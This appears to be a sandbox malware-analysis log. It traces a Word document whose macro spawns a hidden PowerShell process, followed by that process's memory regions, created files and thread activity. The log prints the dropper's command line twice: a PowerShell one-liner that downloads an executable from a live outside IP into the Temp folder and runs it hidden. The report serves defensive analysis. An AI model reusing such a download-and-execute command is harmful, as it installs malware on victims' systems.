Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\System32\stdole2.tlb True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 1
Fn
System Get Cursor x_out = 134, y_out = 125 True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 2
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Enumerate Keys reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 False 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 1
Fn
System Get Cursor x_out = 134, y_out = 125 True 1
Fn
System Get Time type = Local Time, time = 2018-04-20 20:20:35 (Local Time) True 7
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 713, address_out = 0x7ff9b075a1f4 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 528, address_out = 0x7ff9b052273c True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 526, address_out = 0x7ff9b0524974 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 522, address_out = 0x7ff9b0522694 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 712, address_out = 0x7ff9b075a03c True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 617, address_out = 0x7ff9b0522490 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 717, address_out = 0x7ff9b073b034 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 619, address_out = 0x7ff9b0522540 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 524, address_out = 0x7ff9b05226e8 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 632, address_out = 0x7ff9b051fe60 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 608, address_out = 0x7ff9b052142c True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 711, address_out = 0x7ff9b0759eb0 True 1
Fn
Module Load module_name = VBE7.DLL, base_address = 0x7ff9b03e0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = 600, address_out = 0x7ff9b04dc6fc True 1
Fn
Process Create process_name = powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');, os_pid = 0x11a0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
System Get Cursor x_out = 471, y_out = 287 True 1
Fn
Process #2: powershell.exe
1181 55
»
Information Value
ID #2
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');
Initial Working Directory C:\Users\FD1HVy\Documents\
Monitor Start Time: 00:00:37, Reason: Child Process
Unmonitor End Time: 00:05:46, Reason: Terminated by Timeout
Monitor Duration 00:05:09
OS Process Information
»
Information Value
PID 0x11a0
Parent PID 0x1230 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x DA8
0x 138C
0x 1394
0x 135C
0x 10A4
0x 10B8
0x 10D0
0x 1118
0x 1124
0x 10F8
0x 10F4
0x C24
0x C04
0x 11F8
0x 12A8
0x 1044
0x 1188
0x FE0
0x AA8
0x AB4
0x 1050
0x 1064
0x 12F0
0x 1124
0x 1100
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffe0fff Private Memory Readable True False False -
private_0x000000007ffe1000 0x7ffe1000 0x7ffeffff Private Memory Readable True False False -
private_0x0000004808ae0000 0x4808ae0000 0x4808b5ffff Private Memory Readable, Writable True False False -
private_0x0000004808b60000 0x4808b60000 0x4808bdffff Private Memory Readable, Writable True False False -
private_0x0000004808c00000 0x4808c00000 0x4808dfffff Private Memory Readable, Writable True False False -
private_0x0000004808e00000 0x4808e00000 0x4808e7ffff Private Memory Readable, Writable True False False -
private_0x0000004808e80000 0x4808e80000 0x4808efffff Private Memory Readable, Writable True False False -
private_0x0000004808f00000 0x4808f00000 0x4808f7ffff Private Memory Readable, Writable True False False -
private_0x0000004808f80000 0x4808f80000 0x4808ffffff Private Memory Readable, Writable True False False -
private_0x0000004809000000 0x4809000000 0x480907ffff Private Memory Readable, Writable True False False -
private_0x0000004809080000 0x4809080000 0x48090fffff Private Memory Readable, Writable True False False -
private_0x0000004809100000 0x4809100000 0x480913ffff Private Memory Readable, Writable True False False -
private_0x0000004809140000 0x4809140000 0x48091bffff Private Memory Readable, Writable True False False -
private_0x00000048091c0000 0x48091c0000 0x480923ffff Private Memory Readable, Writable True False False -
private_0x0000004809240000 0x4809240000 0x48092bffff Private Memory Readable, Writable True False False -
private_0x00000048092c0000 0x48092c0000 0x480933ffff Private Memory Readable, Writable True False False -
private_0x0000004809340000 0x4809340000 0x480937ffff Private Memory Readable, Writable True False False -
private_0x0000004809380000 0x4809380000 0x48093fffff Private Memory Readable, Writable True False False -
private_0x0000004809400000 0x4809400000 0x480947ffff Private Memory Readable, Writable True False False -
private_0x0000024700000000 0x24700000000 0x24717ffffff Private Memory Readable, Writable True False False -
private_0x000002477afd0000 0x2477afd0000 0x2477afeffff Private Memory Readable, Writable True False False -
pagefile_0x000002477afd0000 0x2477afd0000 0x2477afdffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477afe0000 0x2477afe0000 0x2477afe6fff Private Memory Readable, Writable True False False -
pagefile_0x000002477aff0000 0x2477aff0000 0x2477b007fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b010000 0x2477b010000 0x2477b013fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b020000 0x2477b020000 0x2477b020fff Pagefile Backed Memory Readable True False False -
private_0x000002477b030000 0x2477b030000 0x2477b030fff Private Memory Readable, Writable True False False -
locale.nls 0x2477b040000 0x2477b104fff Memory Mapped File Readable False False False -
private_0x000002477b110000 0x2477b110000 0x2477b11ffff Private Memory Readable, Writable True False False -
private_0x000002477b120000 0x2477b120000 0x2477b126fff Private Memory Readable, Writable True False False -
private_0x000002477b130000 0x2477b130000 0x2477b22ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477b230000 0x2477b230000 0x2477b437fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b440000 0x2477b440000 0x2477b5c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477b5d0000 0x2477b5d0000 0x2477c9cffff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477c9d0000 0x2477c9d0000 0x2477c9d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002477c9e0000 0x2477c9e0000 0x2477c9e0fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x2477c9f0000 0x2477c9f2fff Memory Mapped File Readable False False False -
private_0x000002477ca00000 0x2477ca00000 0x2477ca00fff Private Memory Readable, Writable True False False -
private_0x000002477ca10000 0x2477ca10000 0x2477ca10fff Private Memory Readable, Writable True False False -
private_0x000002477ca20000 0x2477ca20000 0x2477ca26fff Private Memory Readable, Writable True False False -
pagefile_0x000002477ca30000 0x2477ca30000 0x2477ca30fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002477ca40000 0x2477ca40000 0x2477ca4ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477ca50000 0x2477ca50000 0x2477ca5ffff Private Memory Readable, Writable True False False -
private_0x000002477ca60000 0x2477ca60000 0x2477ca60fff Private Memory Readable, Writable True False False -
private_0x000002477ca70000 0x2477ca70000 0x2477ca70fff Private Memory Readable, Writable True False False -
private_0x000002477ca80000 0x2477ca80000 0x2477ca8ffff Private Memory Readable, Writable True False False -
private_0x000002477ca90000 0x2477ca90000 0x2477cafffff Private Memory Readable, Writable True False False -
private_0x000002477cb00000 0x2477cb00000 0x2477cb0ffff Private Memory Readable, Writable True False False -
private_0x000002477cb10000 0x2477cb10000 0x2477cb1ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477cb20000 0x2477cb20000 0x2477cb20fff Pagefile Backed Memory Readable True False False -
winnlsres.dll 0x2477cb30000 0x2477cb34fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x2477cb40000 0x2477cb4ffff Memory Mapped File Readable False False False -
pagefile_0x000002477cb50000 0x2477cb50000 0x2477cb50fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002477cb60000 0x2477cb60000 0x2477cb6ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x000002477cb70000 0x2477cb70000 0x2477cbabfff Pagefile Backed Memory Readable, Writable True False False -
microsoft.powershell.utility.psm1 0x2477cbb0000 0x2477cbb7fff Memory Mapped File Readable False False False -
pagefile_0x000002477cbb0000 0x2477cbb0000 0x2477cbb0fff Pagefile Backed Memory Readable True False False -
r00000000000d.clb 0x2477cbc0000 0x2477cbc5fff Memory Mapped File Readable False False False -
private_0x000002477cbd0000 0x2477cbd0000 0x2477cbdffff Private Memory - True False False -
tzres.dll 0x2477cbe0000 0x2477cbe0fff Memory Mapped File Readable, Writable False False False -
tzres.dll.mui 0x2477cbe0000 0x2477cbeafff Memory Mapped File Readable False False False -
private_0x000002477cbe0000 0x2477cbe0000 0x2477cbeffff Private Memory Readable, Writable True False False -
private_0x000002477cc10000 0x2477cc10000 0x2477cc1ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2477cc20000 0x2477cf56fff Memory Mapped File Readable False False False -
private_0x000002477cf60000 0x2477cf60000 0x2477d069fff Private Memory Readable, Writable True False False -
mscorrc.dll 0x2477d070000 0x2477d0d1fff Memory Mapped File Readable True False False -
private_0x000002477d130000 0x2477d130000 0x2477d13ffff Private Memory Readable, Writable, Executable True False False -
rpcss.dll 0x2477d140000 0x2477d248fff Memory Mapped File Readable False False False -
private_0x000002477d140000 0x2477d140000 0x2477d23ffff Private Memory Readable, Writable True False False -
pagefile_0x000002477d240000 0x2477d240000 0x2477d63ffff Pagefile Backed Memory Readable True False False -
microsoft-windows-client-features-wow64-package-automerged-onecore~31bf3856ad364e35~amd64~~10.0.15063.0.cat 0x2477d640000 0x2477d715fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff640000 0x7df5ff640000 0x7ff5ff63ffff Pagefile Backed Memory - True False False -
private_0x00007ff687810000 0x7ff687810000 0x7ff68781ffff Private Memory Readable, Writable, Executable True False False -
private_0x00007ff687820000 0x7ff687820000 0x7ff6878bffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00007ff6878c0000 0x7ff6878c0000 0x7ff6879bffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6879c0000 0x7ff6879c0000 0x7ff6879e2fff Pagefile Backed Memory Readable True False False -
powershell.exe 0x7ff687ae0000 0x7ff687b4ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff94fe60000 0x7ff94fe60000 0x7ff94fe6ffff Private Memory - True False False -
private_0x00007ff94fe70000 0x7ff94fe70000 0x7ff94fe7ffff Private Memory - True False False -
private_0x00007ff94fe80000 0x7ff94fe80000 0x7ff94ff0ffff Private Memory - True False False -
private_0x00007ff94ff10000 0x7ff94ff10000 0x7ff94ff7ffff Private Memory - True False False -
private_0x00007ff94ff80000 0x7ff94ff80000 0x7ff94ffbffff Private Memory - True False False -
private_0x00007ff94ffc0000 0x7ff94ffc0000 0x7ff94ffcffff Private Memory - True False False -
private_0x00007ff94ffd0000 0x7ff94ffd0000 0x7ff94ffdffff Private Memory - True False False -
private_0x00007ff94ffe0000 0x7ff94ffe0000 0x7ff94ffeffff Private Memory - True False False -
private_0x00007ff94fff0000 0x7ff94fff0000 0x7ff94fffffff Private Memory - True False False -
private_0x00007ff950000000 0x7ff950000000 0x7ff95000ffff Private Memory - True False False -
private_0x00007ff950010000 0x7ff950010000 0x7ff95001ffff Private Memory - True False False -
system.transactions.dll 0x7ff9a8980000 0x7ff9a89cefff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x7ff9a89d0000 0x7ff9a8aa5fff Memory Mapped File Readable, Writable, Executable True False False -
system.numerics.ni.dll 0x7ff9a8ab0000 0x7ff9a8afefff Memory Mapped File Readable, Writable, Executable True False False -
system.xml.ni.dll 0x7ff9a8ba0000 0x7ff9a9436fff Memory Mapped File Readable, Writable, Executable True False False -
system.directoryservices.ni.dll 0x7ff9a9440000 0x7ff9a959efff Memory Mapped File Readable, Writable, Executable True False False -
system.management.ni.dll 0x7ff9a95a0000 0x7ff9a96fffff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x7ff9aa690000 0x7ff9ac694fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x7ff9ac6a0000 0x7ff9ac745fff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x7ff9ac750000 0x7ff9ad10efff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ff9ad110000 0x7ff9add31fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ff9adf10000 0x7ff9af48dfff Memory Mapped File Readable, Writable, Executable True False False -
msvcr120_clr0400.dll 0x7ff9af490000 0x7ff9af586fff Memory Mapped File Readable, Writable, Executable False False False -
clr.dll 0x7ff9af590000 0x7ff9aff6dfff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.management.infrastructure.ni.dll 0x7ff9b0be0000 0x7ff9b0c7afff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x7ff9b1d50000 0x7ff9b1d6bfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.security.ni.dll 0x7ff9b21f0000 0x7ff9b224efff Memory Mapped File Readable, Writable, Executable True False False -
clrjit.dll 0x7ff9b2250000 0x7ff9b2363fff Memory Mapped File Readable, Writable, Executable True False False -
system.configuration.ni.dll 0x7ff9b2370000 0x7ff9b2491fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.dll 0x7ff9b24a0000 0x7ff9b27f4fff Memory Mapped File Readable, Writable, Executable True False False -
system.data.ni.dll 0x7ff9b2800000 0x7ff9b30fcfff Memory Mapped File Readable, Writable, Executable True False False -
mpoav.dll 0x7ff9b3510000 0x7ff9b352ffff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ff9b3530000 0x7ff9b353ffff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ff9b35a0000 0x7ff9b363cfff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ff9bec50000 0x7ff9becb2fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x7ff9ce320000 0x7ff9ce329fff Memory Mapped File Readable, Writable, Executable False False False -
gpapi.dll 0x7ff9d9010000 0x7ff9d9031fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ff9d9750000 0x7ff9d9783fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ff9d9cd0000 0x7ff9d9ce6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ff9d9cf0000 0x7ff9d9cfafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ff9da050000 0x7ff9da074fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ff9da220000 0x7ff9da234fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ff9da240000 0x7ff9da250fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ff9da260000 0x7ff9da270fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ff9da280000 0x7ff9da2cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ff9da2d0000 0x7ff9da518fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32full.dll 0x7ff9da520000 0x7ff9da6a7fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ff9da6b0000 0x7ff9dada2fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ff9dadb0000 0x7ff9dae05fff Memory Mapped File Readable, Writable, Executable False False False -
win32u.dll 0x7ff9dae10000 0x7ff9dae2dfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ff9daee0000 0x7ff9db0a8fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ff9db0b0000 0x7ff9db0f8fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ff9db100000 0x7ff9db169fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ff9db170000 0x7ff9db265fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp_win.dll 0x7ff9db270000 0x7ff9db309fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x7ff9db310000 0x7ff9db317fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ff9db380000 0x7ff9db41dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ff9db420000 0x7ff9db4dffff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ff9db4e0000 0x7ff9dc916fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ff9dcf20000 0x7ff9dcf70fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ff9dcf80000 0x7ff9dcfd8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ff9dd0f0000 0x7ff9dd11cfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ff9dd120000 0x7ff9dd146fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ff9dd150000 0x7ff9dd294fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ff9dd2a0000 0x7ff9dd349fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ff9dd4e0000 0x7ff9dd604fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ff9dd610000 0x7ff9dd6b0fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ff9dd6c0000 0x7ff9dd76dfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ff9dd770000 0x7ff9dda68fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ff9dda70000 0x7ff9ddb0cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ff9ddb10000 0x7ff9ddb7bfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ff9ddc60000 0x7ff9ddda9fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ff9dddb0000 0x7ff9ddf8afff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 59 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_pcfxszbc.ddv.ps1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\fd1hvy\appdata\local\temp\__psscriptpolicytest_gbsbmxho.bhs.psm1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\fd1hvy\appdata\local\temp\phfw.exe 255.01 KB MD5: 368a8f05fa7be1fcc24f445c444acb30
SHA1: 909bee1d1a19f2ea43ba38e826d49c0e7cf958b3
SHA256: 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6aa8d3f
False
Threads
Thread 0xda8
128 0
»
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext False 1
Fn
File Get Info filename = C:\WINDOWS\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Get Info filename = C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Users\FD1HVy\AppData\Local\Microsoft\Windows\PowerShell, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
